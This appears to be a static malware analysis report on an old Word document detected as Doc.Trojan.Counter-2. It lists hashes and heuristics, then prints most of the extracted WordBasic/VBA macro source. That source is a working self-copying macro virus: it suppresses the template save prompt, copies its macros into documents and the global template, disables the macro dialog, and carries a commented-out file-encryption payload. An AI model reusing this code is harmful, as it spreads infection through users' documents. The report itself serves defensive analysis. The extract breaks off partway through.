Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e47d4514d352fde…

MALICIOUS

Office (OLE)

Size: 50.0 KB
Created: 2000-01-07 18:11:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 29f9f59addc5234656bd3d2dd285fea4
SHA-1: d2967fa26e5ae2a66bab87f09e38fa1fedcf8850
SHA-256: 3e47d4514d352fde733b0053ae6bb598044a7f60b1f8da30c3fef6cfb43a8683
Risk Score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains legacy WordBasic macro markers and VBA macros, indicating it is designed to infect other documents. The ClamAV detection 'Doc.Trojan.Counter-2' strongly suggests malicious intent. The macro code attempts to copy itself to other documents and save them, consistent with a macro-based worm.

Heuristics 3

  • ClamAV: Doc.Trojan.Counter-2 | critical | CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Counter-2
  • Legacy WordBasic macro-virus markers | high | OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected | medium | OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5701 bytes
SHA-256: 39b04e4b535e05e48562c10dbf7c67be4f289dbc338ab8e3bbf5d780e4f303ba
Detection
ClamAV: Doc.Trojan.Counter-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "FileSave"

Public Sub MAIN()
Dim DestFile$
Dim MacroFile$
Dim Test
Dim Text_$
Dim Number
Dim Space_$

' ----------------------------
' | Written by Guy Incognito |
' |     Bedford, England     |
' |       on 26/09/97        |
' ----------------------------

On Error Resume Next

DestFile$ = WordBasic.[SelectionFileName$]()
MacroFile$ = WordBasic.[MacroFileName$]()

WordBasic.ToolsOptionsSave GlobalDotPrompt:=0

If MacroFile$ = DestFile$ Then GoTo InfectGlobal

InfectDoc:
If WordBasic.[FileNameInfo$](DestFile$, 3) = "" Then GoTo NoInfect

Test = InStr(DestFile$, ".DOC")
If Test = 0 Then GoTo NoInfect

Text_$ = WordBasic.[MacroDesc$]("Generation")
If Len(Text_$) > 14 Then Text_$ = "0"
Number = WordBasic.Val(Text_$) + 1
Space_$ = Str(Number)
Text_$ = WordBasic.[LTrim$](Space_$)
WordBasic.ToolsMacro Name:="Generation", Description:=Text_$, SetDesc:=1

WordBasic.MacroCopy "FileClose", DestFile$ + ":FileClose"
WordBasic.MacroCopy "FileSave", DestFile$ + ":FileSave"
WordBasic.MacroCopy "ToolsMacro", DestFile$ + ":ToolsMacro"
WordBasic.MacroCopy "FileTemplates", DestFile$ + ":FileTemplates"
WordBasic.MacroCopy "FileExit0", DestFile$ + ":FileExit"
WordBasic.MacroCopy "Generation", DestFile$ + ":Generation"

Rem But all I wanna do is reproduce, man!

Rem If Second(Now()) <> 30 Then Goto NoEncrypt
Rem Key$ = GetSystemInfo$(26)
Rem FileSaveAs .Name = DestFile$, .Format = 1, .Password = Key$
Rem Goto Exit

NoEncrypt:
WordBasic.FileSaveAs Name:=DestFile$, Format:=1
GoTo Exit_

InfectGlobal:

Text_$ = WordBasic.[MacroDesc$]("Generation")
If Len(Text_$) > 14 Then Text_$ = "0"
Number = WordBasic.Val(Text_$) + 1
Space_$ = Str(Number)
Text_$ = WordBasic.[LTrim$](Space_$)
WordBasic.ToolsMacro Name:="Generation", Description:=Text_$, SetDesc:=1

WordBasic.MacroCopy DestFile$ + ":FileClose", "FileClose"
WordBasic.MacroCopy DestFile$ + ":FileSave", "FileSave"
WordBasic.MacroCopy DestFile$ + ":ToolsMacro", "ToolsMacro"
WordBasic.MacroCopy DestFile$ + ":FileTemplates", "FileTemplates"
WordBasic.MacroCopy DestFile$ + ":FileExit", "FileExit0"
WordBasic.MacroCopy DestFile$ + ":Generation", "Generation"

NoInfect:
WordBasic.FileSave

Exit_:

End Sub

Attribute VB_Name = "ToolsMacro"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Runs, creates, deletes, or revises a macro"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.ToolsMacro.MAIN"

Rem You didn't say the magic word.

End Sub

Attribute VB_Name = "FileTemplates"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Changes the active template and the template options"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileTemplates.MAIN"

Rem Not in thledentitl

Attribute VB_Name = "FileClose"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Saves the active document or template"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.FileClose.MAIN"
Dim DestFile$
Dim MacroFile$
Dim Test
Dim Text_$
Dim Number
Dim Space_$

' ----------------------------
' | Written by Guy Incognito |
' |     Bedford, England     |
' |       on 26/09/97        |
' ----------------------------

On Error Resume Next

DestFile$ = WordBasic.[SelectionFileName$]()
MacroFile$ = WordBasic.[MacroFileName$]()

WordBasic.ToolsOptionsSave GlobalDotPrompt:=0

If MacroFile$ = DestFile$ Then GoTo InfectGlobal

InfectDoc:
If WordBasic.[FileNameInfo$](DestFile$, 3) = "" Then GoTo NoInfect

Test = InStr(DestFile$, ".DOC")
If Test = 0 Then GoTo NoInfect

Text_$ = WordBasic.[MacroDesc$]("Generation")
If Len(Text_$) > 14 Then Text_$ = "0"
Number = WordBasic.Val(Text_$) + 1
Space_$ = Str(Number)
Text_$ = WordBasic.[LTrim$](Space_$)
WordBasic.ToolsMacro Name:="Generation", Description:=Tex
... (truncated)